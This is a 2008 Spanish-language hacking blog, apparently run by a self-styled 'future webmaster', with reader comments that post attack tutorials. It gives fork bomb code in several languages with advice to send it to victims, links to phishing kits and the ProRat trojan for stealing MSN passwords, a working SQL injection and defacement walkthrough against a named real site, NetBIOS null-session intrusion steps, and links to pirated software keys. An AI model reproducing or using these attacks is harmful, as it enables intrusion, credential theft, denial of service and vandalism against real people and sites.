miércoles, 16 de enero de 2008
rebeldia cibernetica
antes de nada este blog a sido creado por informatico_loco para formar una elite hackers y asi poco a poco ir subiendo escaños aporten realizen todo lo posible para que me entren ganas de comprar un buen server y crecer cada dia mas con el apoyo de todos podremos convertirnos en una gran elite hackers capaz de contribuir a escala global una red de ciberterrorismo que nos envidien por nuestro poder en la net un saludo vuestro futuro web master.
Suscribirse a:
Enviar comentarios (Atom)







También existe un considerable interés en lanzar software defectuoso que nadie está autorizado a modificar, para luego vender protección (los programas anti-virus no corrigen los errores: simplemente evitan que los virus se aprovechen de ellos, si están activos y actualizados).














27 comentarios:
bueno como yo soy el que creo el blog pues no viene de mal que aporte algo yo el primero bueno antes de nada esto es solo uso educatibo no me ago responsable de vuestros actos ni cualquier daño que puedan causar y sin mas bla bla bla al ajo que me lio: bueno lo intentare resumir lo menos posible y sobre todo explicarlo de manera que todos lo podamos entender. en este caso hablare de las bombas fork,y ustedes se preguntaran que es una bomba fork pues una bomba fork es es una forma de ataque del tipo denegación de servicio sobre un computador que implementa la operación fork, o alguna funcionalidad equivalente mediante la cual un proceso es capaz de crear otro proceso.La bomba fork es considerado un wabbit ya que no se replica de la misma forma que los gusanos o los virus resumiendo un poko lo que ase es cargar muchos recursos dejando asi el ordenador colgado y en algunas ocasiones sin linea jejejej bonito verdad pero claro se preguntaran y como se ase eso jajajaj que tonto no explica lo que es pero no nos dice como se realiza ese ataque pues si se los voy a decir hay va como todos sabemos existen varios s.o. para los que no saben que significa (s.o.) es la avrebiatura de sistema operativo bien dicho esto seguimos 1 paso vamos a crear una bomba fork para linux el s.o. por exelencia de los hacker: sencillamente en linux abrimos una terminal y tipeamos estos caracteres :(){ :|:& };: bien ya tenemos nuestra bomba fork creada y nuestro ordenador loko como una cabra al pulsar la tecla enter claro pero ustedes pensaran jajajaj que idiota le voy aser caso a anonimohp yo no quiero que mi ordenador se rompa en ese caso si quieres que una victima realise ese trabajo y supuestamente use linux pues la unica forma es entrar a su ordenador acediendo por ssh y lo ejecutaremos en su consola no voy a explicar lo que es ssh ahora lo explicare mas adelante bien ahora viene lo divertido en windows es mucho mas facil pues que solo usando un archivo bat: :sstart %0 goto s y enviandoselo a tal persona por cualquier forma como por ejm via ftp,messenger ,correo electronico etc etc y que lo ejecute los antivirus no lo detectan podes poner una foto en ese archibo o lo que te salga de los huebos poner ahy mas formas de asernos nuestra bomba fork en windows o bien usando perl que seria algo asi:(forking usando el intérprete Perl):
perl -e "fork while fork" & o usando el lenguaje de programacion c que nos quedaria asi : #include unistd
int main()
{
while(0==0)
fork();
} bueno para macintosh no lo explicare porque ya se me esta asiendo un poko largo el tutorial jejej en mi proximo posteo pues ya se me ocurrira otra cosa como por ejm bombas loguicas o bombas ansi espero que les aiga gustado mi tutorial y asta la proxima.al igual que yo me moleste en escribirlo espero que os molesteis en leerlo un cordial saludo anonimohp.
si man eres el mejor y claro las bobas fork son aquellas q sirven para entender o explotar la denegacion de el server u (ordenador) grax por lo de la boba fork man eres el mejor.... ok bye bye
La cosa va de la siguiente forma:
1. Escribe “about:config” en la barra de direcciones de Firefox y aprieta retorno. Esta es la página de configuración avanzada de Firefox. Busca los siguientes valores:
network.http.pipelining network.http.proxy.pipelining network.http.pipelining.maxrequests
2. Modifica esas entradas de la siguiente manera (haz clic sobre ellas y verás que cambian sus valores de “falso” a “verdadero”.
Cambia “network.http.pipelining” a “true”
Cambia “network.http.proxy.pipelining” a “true”
Cambia “network.http.pipelining.maxrequests” a un número por el rango de 30. Esto hará que el navegador realice 30 peticiones de forma simultánea.
Normalmente Firefox realiza una petición a una página vez a la vez. Cuando activas el “pipelining” harás que haga varias a la vez, lo que acelera notablemente la carga de la página.
3. Haz clic con el botón derecho en cualquier lugar de la página y selecciona “Nuevo -> Entero”. Nombra el nuevo campo como “nglayout.initialpaint.delay” y ponle un valor de “0”. Con esto le estás diciendo al navegador que no espere para mostrar en pantalla la información en pantalla que recibe.
hola user bueno aqui un aporte cortesia de magos en la web un team chileno les dejo un fake de msn recuerden subir todos los acrivos a web.iespana.es aqui les dejo el link jajajjaja yeha somos los mejore
http://rapidshare.com/files/84424681/Fake_Fotolog.zip
recuerden que para revisar quien cae deven poner robados.txt despues de su linck creado yehaaaa a se recomienda para difrasar el linck y que sea menos sospecho crear un dominio en http://rapidshare.com/files/84427166/scam-hotmail_2_original.rar
agradescan man cualquier duda comunicarse a lion_of_fire_1@hotmail.com
tratar con dark
este block es para los usuarios de XP q se q la mayoria q exprimentan el hacking lo usan.......bueno aqui les hablare de un Troyano llamado (Prorat-V 1.0) Prorat es un Troyano q funciona Con un Cliente y un server el server es (la IP de la victima) Claro el cliente sera siempre este por defecto (5110) pero hay algo q todos se preguntan como podemos usar el Prorat para Logral optener la Password de mi contacto o amigo de el msn-----bueno aqui les dejo algo............... miren para lo q quieren solo tienen q poner un (Keyloger) a la victima un Keyloger es una herramienta muy usada q biene por defecto en el Troyano (prorat) solo creas el server le mandas el Server a la victima y cuando la victima abra el server automaticamente se ejecuta el server en su ordenador o (pc) y te mandara los datos necesarios incluyendo en ellos la IP,Password Del ordenador y algunas cosas mas etc etc etc...bueno una ves con la IP... sol tienes q colocarla en el troyano q es el server de la victima luego colocas el port q viene por defecto q es (5110) y le pones el (keylogger)
Bueno para q sirve el Keylogger el Keylogger sirve para ver las Telas (keys)q el usuario pulsa en su ordenador ocea q si le mandas el Keylogger entonces veras lo q el hace con su teclado....bueno eso es todo cualquier duda consultar el blog de nuevo sin miedo pregunten nadie nace saviendo jajaja... seran buenos hackers jajaja bueno me despido aqui les dejo la link de el prorat para q lo descarguen ok...(http://freehackerbrasil.blogspot.com/2007/09/download-prorat-20.html) y un manual para q entiendan mejor tiene imagenes -------(http://www.foromsn.com/index.php?Ver=Mensaje&Id=146670&WebOrigen=1) GOG_ASDF@hotmail.com
hello como estan todos aqui les dejo algo de hacking es compatible para (linux) como por igual por (MS-DOS)....le hablare de el telnet lo basico para saver q es jaja..----es el nombre de un protocolo de red (y del programa informático que implementa el cliente) que sirve para acceder mediante una red a otra máquina, para manejarla como si estuviéramos sentados delante de ella---bueno como ya saven q es un portocolo de internet q pide loggin y password no es muy usado por los hacker ya q el (SSH) es mejor porq solo pide password bueno eso de login no es problema para un (hacker).....ya vamos a el grano estamos escriviendo mucho jajaj----miren para el telnet usamos estos comandos---telnet mas la IP de la victima y luego el port q es el 23 por defecto luego una vez dentro digitamos el nombre de usuario no usen (Root) q nunca les dira q esta correcto el login tampoco usen admin ni nada de eso miren para MS-DOS les quedaria asi---telnet (ip de la victima) 23 q es el port de Telnet por defecto...bueno eso es todo alguna duda solo contactar el foro de nuevo sin miedo nadie nace saviendo jajajaj...bye bye..... (-,-)
bueno miren para el linux esta el (SSH) ssh es una herraminta de red q sirve al igual q el telnet pero la diferencia es q no pide login solo pass--claro ... bueno miren como queda en la terminal---(ssh -22 IP) bueno eso es todo aaa se me olvidaba algo miren para hacerlo en XP es mejor q no porq solo les dara Errol las mayoria de las veces es con errol pero miren para eso existen emulacion de ssh con XP y de telnet Con XP..si no instalan un emulator para ssh y telnet uotro port no podran hacer atakes o conexiones entre 2 server en la Red.. bueno para los q no saven q es un emulador miren aqui (un emulador es un software que permite ejecutar programas de computadora en una plataforma (arquitectura hardware o sistema operativo) diferente de la cual fueron escritos originalmente.) bueno me despido bye bye jajaja..asta luego cualquier duda sonsultar sin miedo nadie nace sabiendo jajaj.... bye
queridos amigos de la net hoy tratare de explicarles como realizar vuestros propios wallpapers yo lo he echo como el de matrix pero animado un fondo animado no uso windows se que esto no es tecnica hackers pero para los que usan windows les gustara bueno vamos al grano antes de nada abrimos un documento en blanco y vamos a filtro/textura/granulado y le damos estos valores
Intensidad:96
contraste:99
tipo de granulado: vertical
damos ok vale asta aqui bien os saldra unas rayitas en vertical de color negras bueno pues ahora aremos lo siguiente
2- despues vamos a filtro/artistico/resplandor de neon y le damos estos valores
tamaño de resplador:7
brillo resplador:20
color: rosa (no os preocupeis ya nos cambiara a verde) damos ok vale ahora seguiremos con el siguiente pàso 3- ahora filtro/estilizar/bordes resplandecientes y le damos estos valores
anchura del borde:1
brillo del borde:6
suavizar:1
con esto ya tenemos nuestro fondo Matrix
bonito verdad jejejej ahora vams a darle animacion Pulsamos CTRL+J para duplicar la capa, y acto seguido pasamos Imagenready ya en Imagenready, pulsamos dos veces sobre la capa fondo para convertirlo en capa.
abajo en la ventana animacion duplicamos el cuadro haciendo clip en el botonya en Imagenready, pulsamos dos veces sobre la capa fondo para convertirlo en capa.abajo en la ventana animacion duplicamos el cuadro haciendo clip en el boton elegimos la herramienta mover y bajamos una de las capas hasta la mitad y subimos la otra despues presionamos intercalar y ponemos 0,2 segundos y ya esta tenemos nuestro fond matrix animado como el de la pelikula espero que os aiga gustado y asta la proxima
bueno queridos amigos de la net hoy os traigo un tutorial sobre conexiones bluetho con un portatil y un mobil todos sabemos que aveces estamos con nuestro portatil y no hay redes inalambricas al alcance de nuestro wifi o simplemente las que hay tienen claves aunque podemos decisfrarlas desde varios proframas como el cain y abel o el jhon la verdad yo me quedo con el mdcrack si estas usando windows si usas linux pues el jhon va de maravillas bueno este no es el tema que voy a tratar ahora asi que vamos a lo que ivamos antes de nada para conseguir red mediante bluetho tenemos que tener los dispositivos sincronizados esto no lo voy a explicar ya que todo el mundo sabra como sincronizar un mobil y un pc para que puedan interactuar entre ellos y dejando esto atras vamos a lo que vamos este tutorial es para la gente que usa windows:entrar en Inicio/Panel de control/Opciones de teléfono y módem y comprobar que nuestro Modem sobre IR o Modem sobre Bluetooth aparece en la lista. A continuación seguir los sigueintes pasos para configurar el acceso a Internet: Sobre "Mis sitios de red", pulsar el botón derecho y seleccionar propiedades
Seleccionar "Crear una conexión nueva"
Se abre un asistente donde decimos: que queremos conectarnos a Internet, que lo vamos a configurar manualmente, y que vamos a acceder por modem. A la conexión habrá que darle un nombre, por ejemplo "conexión por movil" y hay que tener cuidado para seleccionar el modem que hemos configurado en el apartado anterior en lugar del típico modem por cable que suelen llevar los portátiles.
# Por último nos pregunta el número de teléfono a donde llamar, el usuario y la contraseña. y claro yo tengo los nombres de usuarios y las claves para que todos disfruten de internet al aire libre en cualquier momento dia hora y minuto no importa estes donde estes ahy van las claves jajajja
para mobistar numero de telefono a marcar *99***1# clave mobistar y usuario mobistar ahora amena(orange)que biene siendo lo mismo seria asi tono de marcado el mismo de antes pero este cambia el usuario seria este cliente y la clave amena ahora para vodafon el mismo tono de marcado pero cambia las claves y el usuario que seria asi wap@wap ese seria el usuario y la clave seria wap125 bien esto es para conectar via gprs mas rapido que via gsm que tambien se podria conectar pero no lo explicare porque se me esta asiendo muy grande ya el tutorial asi que espero que les aiga gustado y un saludo atentamente anonimohp asta el proximo tutorial
hola amigos pues andaba el otro dia navegando por la red como espiderman jajaj y me dije a mi mismo olle porque no buscar las llabes del kaspesrky 2008 y el nod 32 para toda la vida y asi los muchachitos pueden disfrutar de sus dos mejores antivirus aunque para mi el mejor antivirus es gnu/linux y bueno aqui se las dejo espero q les sirva http://rapidshare.com/files/80952091/llaves_del_kaspersky_7_by_tigrito-gt.rar.html esta es para el kaspersky y esta es para el nod 32 que funciona igual para todas las versiones http://rapidshare.com/files/80230612/F.N32_Equally_works_with_all_versions___By_______.rar solo que esta es para toda la vida vamos que no se caduca y las del kaspersky son asta el 2010 bueno esto es todo asta la proxima
ola amigos de nuebo otra ves como siempre os traigo este maravilloso complejo de seguridad porque Protegeros en Internet cada día se vuelve una tarea más complicada. No os basta con un antivirus o un Firewall, son necesarios varios programas que os permitan detener las diversas amenazas de Internet. Claro, existen suites que os ofrecen toda la protección en un solo paquete.
Agnitum Outpost Security Suite Pro os ofrece una robusta combinación: un Firewall bidireccional varias veces premiado, un rápido y efectivo antivirus y un sistema antispam personalizado; todo para proteger vuestro ordenador de las amenazas de Internet todo el tiempo.
La suite cuenta con un avanzado sistema de monitoreo en tiempo real que os alertará de cualquier peligro en la interacción de los programas, incluye un sistema asistido de configuración, actualizaciones automáticas y su interfaz es atractiva y fácil de usar.
Características:
Firewall bidireccional.
Antivirus con sistema de detección de todo tipo de programas de código malicioso.
Sistema antispam personalizable.
Monitoreo avanzado en tiempo real.
Actualizaciones automáticas.
Interfaz atractiva y fácil de usar.
descargar aqui
http://depositfiles.com/files/3016615
saludos. y asta la proxima
hola que tal andan todos hoy les traigo netscan mas comunmente llamado soft perfect network Scanner para los usuarios de windows compatible con todas las distribuciones de win se basa en un escaner de redes lleba una interfaz muy simple y facil de usar y lo mejor de todo que al colocar una ip a escanear y en la otra barra pones por ejm 255 lo dejamas lo dejas con los 0 te escanea por pnerles un ejemplo 192 a 255 pues te escanea todas las ips comprendidas entre esos rangos dandote la posibilidad hasta de visualizar esos ordenadores copiar archibos que nos interesen borrarle el disco duro etc etc lo vemos todo en modo grafico como si estubieramos delante del propio ordenador cuando veamos una simbolo como este + alado de la ip significa que ese ordenador tiene aceso sin clave y sin loguin podiendo acceder muy facilmente ticleando en el mouse clic izquierdo y visualizar los documentos que quieras ver lo podeis descargar desde softonic gratis y sin licencia solo bajarlo no ase falta instalacion se instala automaticamente esta libre de virus u codigos maliciosos yo ya lo escanee aqui les dejo la link de descarga directa http://softperfect-network-scanner.softonic.com/descargar un saludo fieles seguidores de este blog demosles por culo a todas esas web de hacking que copian post entre si lo contrario que yo los tutos me los curro yo no los copio de ningun lado buena suerte y hasta la proxima atentamente anonimohp
hoy les traigo lo ultimo en seguridad informatica se trata de un programa biometrico por reconocimiento de rostro usando nuestra web cam o camara web el programa saca una foto de nuestro rostro y nos pide una clave por ejm cuando vas a comer algo o dejas descargando algo el programa bloquea nuestro pc asi evitaremos que tengan aceso fisico a nuestro pc cuando volvemos pasamos nuestra cara por nuestra web cam y nos pide la clave y asi poder entrar aun no se abla nada de que salga para gnu/linux pronto estara para mac para windows si esta se llama lemon screen lo podeis descargar desde http://www.keylemon.com/ aun esta en beta no le podemos dar la confianza absoluta no obstante yo e realizado algunos test para comprobar su fiabilidad y me an salido un 90% estable es un proyecto de la gente de banana securyty muy buena gente por cierto en wiki pedia en esta secsion http://es.wikipedia.org/wiki/Biometr%C3%ADa podeis ver que tan fiable es la biometrica y sus tablas si nada mas que añadir bueno me olvido el programa es gratis y facil instalacion espero vuestros comentarios un saludo anonimohp como siempre comentando lo mejor.
hola deseo hackear un correo por ese motivo necesito de tu ayudar por q yo ser q tu tienes tiempo es esto q debo hacer este es mi correo the_latino_quiroz@hotmail.com espero muy pronto tu ayuda gracias
Bueno Me Uno A Este Blog Que Es Del Gran Info Loko Que La Verdad Me Ah Enseñado Mucho La Verdad Y Lo Que Me Gustaria Es Estar En Donde El Esta [Aclaro Menos En El Baño HaHaHa] Puesto Que El Es Una Persona Que Enseña Voluntariamente [Siempre Y Cuando No Tenga Trabajo xD] Bueno Espero Poder Seguir En Este Blog Siempre Y Cuando Aprenda A Utilizarlo
Saludos By Av_Toni
Colección de Libros sobre Hacking
El hacking o jaqueo se basa en el arte informático de construir y solucionar problemas que atenten contra la vulnerabilidad de un sistema o aplicación, compartiendo este mismo método con otros hackers y al contrario de lo que erróneamente suele afirmarse no es la técnica de ejecutar una aplicación para robar contraseñas y romper un sistema a través de malware, spyware o un ping, estas acciones las hacen los lamers, y en menor medida, cuando se ha hecho un ataque prolijo sabiendo lo que se hace es realizado por crackers.
En resumen, el hacking es la técnica o arte de encontrar los límites de los productos, aparatos y servicios digitales de informática o comunicaciones y compartirlo con otros y/o los fabricantes mismos de ésos productos.
Colección
* (Ebook - Computer) Hacking The Windows Registry.pdf
* (eBook - PDF) Hugo Cornwall - The Hacker’s Handbook .pdf
* (eBook pdf) Hacking into computer systems - a beginners guide.pdf
* (ebook - pdf) Hacking IIS Servers.pdf
* A Beginners Guide To Hacking Computer Systems.pdf
* amazon-hacks.chm
* Attacking the DNS Protocol.pdf
* Auerbach Practical Hacking Techniques and Countermeasures Nov 2006.pdf
* bsd-hacks.pdf
* Certified Ethical Hacker (CEH) v3.0 Official Course.pdf
* Computer - Hackers Secrets - e-book.pdf
* cracking-sql-passwords.pdf
* Crc Press - The Hacker’S Handbook.pdf
* Credit Card Visa Hack Ucam Cl Tr 560.pdf
* DangerousGoogle-SearchingForSecrets.pdf
* database hacker handbook.chm
* Dummies - Hack How To Create Keygens.pdf
* ebay hacks 100 industrial strength tips and tools.pdf
* eBooks OReilly - Wireless Hacks 100 Industrial - Strength Tips and Tools.chm
* ethical hacking, student guide.pdf
* excel hacks.chm
* google hacks.pdf
* Guide to Hacking with sub7.doc
* Hack IT Security Through Penetration Testing.pdf
* Hack Proofing - Your Network - Internet Tradecraft.pdf
* Hack Proofing Linux A Guide to Open Source Security - Stangler, Lane - Syngress.pdf
* Hack Proofing Sun Solaris 8.pdf
* Hack Proofing Your E-Commerce Site.pdf
* Hack Proofing Your Identity In The Information Age.pdf
* Hack Proofing Your Network Second Edition.pdf
* Hack Proofing Your Network First Edition.pdf
* Hack Proofing Your Web Applications.pdf
* Hacker Disassembling Uncovered.chm
* hacker ethic.pdf
* Hacker Linux Uncovered.chm
* Hacker Web Exploitation Uncovered.chm
* Hacker’S.Delight.chm
* Hackers Beware.pdf
* Hackers Secrets Revealed.pdf
* Hackers Secrets.pdf
* Hackers, Heroes Of The Computer Revolution.pdf
* Hackers Secrets.pdf
* Hacker s Guide.pdf
* Hacking - Firewalls And Networks How To Hack Into Remote Computers.pdf
* Hacking - The Art of Exploitation.chm
* Hacking Cisco Routers.pdf
* Hacking Exposed - Network Security Secrets & Solutions, 2nd Edition.pdf
* Hacking Exposed Network Security Secrets & Solutions, Third Edition ch1.pdf
* Hacking For Dummies 1.pdf
* Hacking For Dummies 2.pdf
* Hacking For Dummies.pdf
* Hacking GMail.pdf
* Hacking IIS Servers.pdf
* Hacking into computer systems - a beginners guide.pdf
* hacking the windows registry.pdf
* Hacking Windows XP.pdf
* Hacking-ebook - CIA-Book-of-Dirty-Tricks1.pdf
* Hacking-Hacker’s Guide.pdf
* Hacking-Hackers Secrets Revealed.pdf
* Hacking-Hugo Cornwall-The Hacker’s Handbook.pdf
* Hacking-The Hacker Crackdown.pdf
* Hacking For Dummies Access To Other People’s System Made Simple.pdf
* Hacking.Guide.V3.1.pdf
* Hackproofing Oracle Application Server.pdf
* Hack Attacks Revealed A Complete Reference With Custom Security Hacking Toolkit.
* Hack IT Security Through Penetration Testing.chm
* Halting.The.Hacker.A.Practical.Guide.To.Computer.Security.chm
* How to Crack CD Protections.pdf
* John Wiley & Sons - Hacking For Dummies.pdf
* John Wiley and Sons Hacking Windows XP Jul 2004 eBook-DDU.pdf
* linux-server-hacks.pdf
* little black book computer viruses.pdf
* mac-os-hacks.chm
* McGraw-Hill - Hacking Exposed, 3rd Ed - Hacking Exposed Win2.pdf
* McGraw Hacking Exposed Cisco Networks.chm
* McGraw Hill HackNotes Network Security Portable Reference eB.pdf
* McGraw Hill HackNotes Web Security Portable Reference eBook.pdf
* McGraw Hill HackNotes Windows Security Portable Reference eB.pdf
* Mind Hacks - Tips & Tricks for Using Your Brain.chm
* network-security-hacks.chm
* No Starch Press Hacking The Art Of Exploitation.chm
* O’Reilly - Online Investing Hacks.chm
* O’Reilly - Network Security Hacks.chm
* O’Reilly Windows Server Hack.chm
* O’Reilly Windows Server Hack.rar
* online-investing-hacks.chm
* OReilly Google Hacks, 1st Edition2003.pdf
* OReilly - Google Hacks.pdf
* Oreilly, Paypal Hacks (2004) Ddu.chm
* OReilly, IRC Hacks (2004).DDU.chm
* OReilly SQL Hacks.Nov.2006.chm
* OSB Ethical Hacking and Countermeasures EC Council Exam 312.50 Student Coursewar eBook LiB.chm
* O´Reilly - Windows XP Hacks.chm
* PC Games - How to Crack CD Protection.pdf
* Security and Hacking - Anti-Hacker Tool Kit Second Edition.chm
* SoTayHacker1.0.chm
* spidering-hacks.chm
* SQL Hacks.chm
* SQLInjectionWhitePaper.pdf
* Syngress - Hacking a Terror Network. The Silent Threat of Covert Channels.pdf
* Syngress - Hack Proofing Your Wireless Network.pdf
* Syngress Hack Proofing Your Identity in the Information Age.pdf
* Syngress Buffer Overflow Attacks Dec 2004 eBook-DDU.pdf
* Syngress Hack the Stack Oct 2006.pdf
* The Little Black Book Of Computer Virus.pdf
* The Little Black Book of Computer Viruses.pdf
* tivo-hacks 100 industrial strength tips and tools.pdf
* u23 Wiley - Hacking GPS - 2005 - (By Laxxuss).pdf
* Wiley The Database Hackers Handbook Defending Database Servers.chm
* Win XP Hacks oreilly 2003.chm
* Windows Server Hacks.chm
* WinXP SP1 Hack.pdf
* Xbox hack - AIM 2002 008.pdf
* Yahoo Hacks Oct 2005.chm
descargas:
http://www.filefactory.com/f/5a1d06bc5aaa6997/
Hola De Nuevo Master, Pues Como Habia Dicho En El Msn Quiero, Aprender Desde Cero, Como Si Le Estuvieras Enseñando A Un Niño Que Toca Por Primera Vez Una Pc Habria Que Saber Por Donde Empezar Puesto Que No Se Por Donde, Ni Como Empezar, Y Sobre Todo Que Empezar A Leer, Estudiar Y Practicar Espero Me Ayudes Tio
Saludos Tu Gran Fiel Av_Toni
hola aquiles dejo un regalito si querias tener tu sistema operativo de Microsoft windonws xp original sigue estos pasos y lotendras gratis**********
<<<(senpablo)>>>
Descargar archivo:
http://www.fileden.com/files/2006/12/20/536041/xp_original_senpablo.zip
help **********
01 Ser un Hacker
02 Windows y Linux
03 Puertos y Protocolos
04 Servicios y Conexiones
05 Identificacion y Conexiones
06 Malware
07 Attack Analysis
08 Digital Forensics
09 Seguridad Email
10 Web Security and Privacy
11 Passwords
12 Legalidad y etica en internet
espero que sea util esto descargar: archivo Winrar
http://www.fileden.com/files/2006/12/20/536041/help.rar
.... mucho para leer..
una forma rapida facil y muy limpia de hacer defaced!!!
materiales ke necesitaras:
-GOOGLE.com
-Inyección SQL
-URL victmia
-Conocimiento minimo sobre html
Bueno futuros ciberpunk xD(), sigan estos pasos tal cual como se los digo y podran tener su primer acceso a una url.
1.- van a www.google.com , luego en el campo de busqueda ingresan lo siguiente: allinurl:links.asp?action=whatsnew ,bueno luego le dan ahi ke buske san google y les dara muchas paginas .. ahora tienen ke abrir una de esas paginas por ejemplo yo abri: http://www.powerchutes.com/weblinks/links.asp
ahora en todas estas paginas encontraran la extension /links.asp arriba en la barra del navegador, lo siguiente a hacer es borrar links.asp y dejar desde el / hacia atras. osea kedaria de la siguiente manera:http://www.powerchutes.com/weblinks/
ahora pegar la inyeccion sql seguido del /
esta es la inyeccion= sin perentesis( links.asp?action=reporterror&linkID=221%20union%20 select+0,administrativepassword,0,0,0,0,0,0,0+from +config ) , entonces le tendria ke kedar de la siguiente manera: [url]http://www.powerchutes.com/weblinks/links.asp?action=reporterror&linkID=221%20union%20 select+0,administrativepassword,0,0,0,0,0,0,0+from +config
Bueno luego le dan enter (intro). y si les aparece una pantalla ke dice REPORT AN ERROR y mas abajo les dice:link tittle: "aki va una palabra" y abajo de esto dice email addres: y un espacio vacio.
Bueno les cuento ke la palabra ke les da link tittle es la password de aministrador, entonces uds la copian y luego pinchan en administrador y les pedira introducir el password, pegan el password y listo... ya les deberia salir los controles de aministrador y para modificar la pagina van donde dice modify style abren ahi y luego llegan abajo donde hay dos cuadros y borran el contenido.. ahora solo les keda pegar su pagina escrita en html y luego la suben....
asi de facil... les entregue las herramientas y paso a paso lo ke deben hacer... tienen ke poner un poco de su parte y pensar, procesar y crear.. ahora les toca a uds...
hola chicos lo siento pero he tenido trabajo en este tiempo que no he aparecido les ruego pacienciencia gracias por la atencion requerida chicos y disculpen las molestias. y buenos aportes y comentarios sanpablo te felicito bueno aqui estoy de nuevo con ustedes.
hola regrece jejeje -----
----------
aca lesdejo esto asalto netbio
¿NETBIOS?
ENTRANDO POR NETBIOS
CRACKEANDO LOS PASSWORDS
MÉTODO RÁPIDO
En esta sección vamos a tratar de explicar primero qué es NETBIOS y como se puede establecer una comunicación por NETBIOS, para después, y mas importante, citar las mejores utilidades para realizar este ataque, gracias a las cuales el hack por NetBIOS se ha convertido un casi un mero trámite, hablaremos al final de algunos programillas muy nuevos que son capaces, gracias a un bug descubierto en el año 2000 por NSFOCUS, de desvelar los paswords de los recursos compartidos de cualquier windows 9x/Me no parcheado, en menos de un minuto.
¿NETBIOS?
NETBIOS (Network Basic Output/Input System que en español Sistema Básico de Red Entrada/Salida) es el protocolo que se encarga de compartir los archivos y las impresoras entre varios ordenadores. Tal vez habrás oído mencionar alguna vez el NETBEUI (NetBIOS Extended User Interface o Interfaz de Usuario Extendido),pues bien, es lo mismo pero NETBIOS lo desarrollaron IBM y Sytek, y NETBEUI lo desarrollo microsoft, tratando de optimizar el NETBIOS para Windows.
Es habitual oír hablar simplemente del "139" este es el puerto por el que funciona este protocolo, el 137 y el 138 también forman parte de este protocolo,
NetBIOS-ns 137 TCP / UDP NetBIOS Name Service
NetBIOS-dgm 138 TCP / UDP NetBIOS Datagram Service
NetBIOS-ssn 139 TCP / UDP NetBIOS Session Service
Para poder comprobar este ataque con éxito debes tener instalado el protocolo en tu PC, para ello, si tienes Windows 95 / 98 /Me debes ir a
INICIO \ CONFIGURACION \ PANEL DE CONTROL \ RED e instalar el cliente para redes Microsoft, el protocolo TCP/IP y activar "Compartir archivos e impresoras", si utilizas el Windows NT4 / 2000 / XP debes hacer lo mismo pero, en estos sistemas se hace en cada conexión a Internet por separado (sólo necesitas activarlo en aquella que vayas a utilizar para el ataque.
ENTRANDO POR NETBIOS
Lo que se explica a continuación se puede utilizar desde un windows para atacar otro windows, aunque el ataque está pesado para NT sería muy similar si quisiéramos atacar un Windows 9x, pero no voy a entrar en muchos detalles, porque debido a que hoy en día existen maneras mas fáciles y rápidas de hacerlo, esta sección la he puesto sólo como curiosidad.
Una vez elegida la máquina a la que quieres entrar solo necesitas el Ms-Dos, o el Símbolo de Sistema, que para el caso es lo mismo, pues bien abres una ventana y escribes:
nbtstat -A 192.168.0.1
(si lo que conoces es la IP de la victima)
nbtstat -a nombre_del_PC
(si conoces solo su nombre)
pueden ocurrir varias cosas, si recibes:
C:\WINDOWS>nbtstat -A 192.168.0.1
Host not found.
Pues queda claro que "not found" , o no está conectado, o no comparte archivos, o no existe (mira a ver si lo escribiste bien)
Si la respuesta es:
C:\WINDOWS>nbtstat -A 192.168.0.1
NetBIOS Remote Machine Name Table
Name Type Status
--------------------------------------------------------------
NAME <00> UNIQUE Registered
WORKGROUP <00> GROUP Registered
NAME <03> UNIQUE Registered
MAC Address = 00-00-00-00-00-00
Pues aunque parezca mejor, para el caso nos da igual, porque aunque si lo tiene instalado, no comparte nada.
Si recibimos:
C:\WINDOWS>nbtstat -A 192.168.0.1
NetBIOS Remote Machine Name Table
Name Type Status
----------------------------------------------------------------
NAME <00> UNIQUE Registered
WORKGROUP <00> GROUP Registered
NAME <03> UNIQUE Registered
NAME <20> UNIQUE Registered
WORKGROUP <1E> GROUP Registered
MAC Address = 00-00-00-00-00-00
En este si... la diferencia importante es el <20> que corresponde al "File Server Service" (Servicio servidor de archivos), solo los PC que tienen el <20> tienen archivos compartidos y accesibles.
El IPC$ (Inter-Process Communication) es un recurso compartido oculto estándar en una máquina NT , y es utilizado por el servidor para establecer comunicación con otros equipos.
Conectándose al IPC$ un intruso puede establecer una comunicación valida con el servidor NT. Conectándose como null, el intruso puede establecer dicha comunicación sin necesidad de introducir user:password.
Para ello se utiliza el siguiente comando:
c:\>net use \\[ip_de_la_víctima]\ipc$ "" /user:""
The command completed successfully.
Puedes ver qué comparte esa computadora sin necesidad de entrar, para ello utiliza el comando NET
C:\>net view \\192.168.0.1
recibirás algo así:
Shared resources at 192.168.0.1
Share name Type Used as Comment
----------------------------------------------------
NETLOGON Disk Logon server share
Test Disk
The command completed successfully.
Es posible que ocurra:
C:\>net view \\192.168.0.1
System error 5 has occurred.
Entonces primero tienes que establecer la "null session"
C:\>net use \\192.168.0.1\ipc$ "" /user:""
The command completed successfully.
Ahora el C:\>net view \\192.168.0.1
si funcionará
Para conectar a la carpeta compartida.
The command completed successfully.
Si escribes net use ahora, recibirás algo así:
Status Local Remote Network
-------------------------------------------------------------
OK X: \\123.123.123.123\test Microsoft
OK \\123.123.123.123\test Microsoft
The command completed successfully.
Para acceder directamente al PC solo tienes que:
*escribir en el explórer \\192.168.0.1
*INICIO / EJECUTAR y poner lo mismo \\192.168.0.1
*Botón derecho en Mis Sitios de Red > Buscar Equipos... y lo mismo 192.168.0.1
*En una ventana de símbolo de sistema escribir:
C:\>net use x: \\192.168.0.1\test
y después
C:\>dir x:
Este ataque solo funcionará si la carpeta compartida no tiene pasword.
Recuerda que un intruso no está limitado a los recursos compartidos que aparecen con el net view.
Un intruso que conozca NT sabe que existen otros recursos compartidos ocultos para uso administrativo. Por defecto NT
crea el IPC$ y otro por cada partición (por ejemplo una máquina que tiene C, D, y E tendrá sus correspondientes C$, D$, y E$).
También hay un ADMIN$ que pertenece a la ruta donde fue instalado el NT (por ejemplo si instalaste NT en C:\winnt, entonces ADMIN$ apunta exactamente a esa parte del disco).
CRAKEANDO LOS PASSWORDS
----[esta parte está tomada del grupo DeepZone Digital Security]----
El 24 de agosto del 2000 NS-FOCUS - http://www.nsfocus.com - hacía pública una vulnerabilidad en la implementación del protocolo NETBIOS en todos los sistemas operativos corriendo el kernel 9x de la empresa Microsoft (tm), incluyendo el nuevo Windows ME y las versiones más avanzadas de Windows 98.
La vulnerabilidad en si misma no es más que un error de implementación a la hora de establecer la longitud del password para validarlo ante una petición NETBIOS.
Los sistemas vulnerables obtienen el número de bytes a comparar para el password del paquete que reciben del cliente.
Un usuario malicioso podría establecer la longitud del password a 1 byte intentar un ataque por fuerza bruta contra el password compartido. El número de intentos que debería realizar sería tan sólo de 256 (2 elevado a 8).
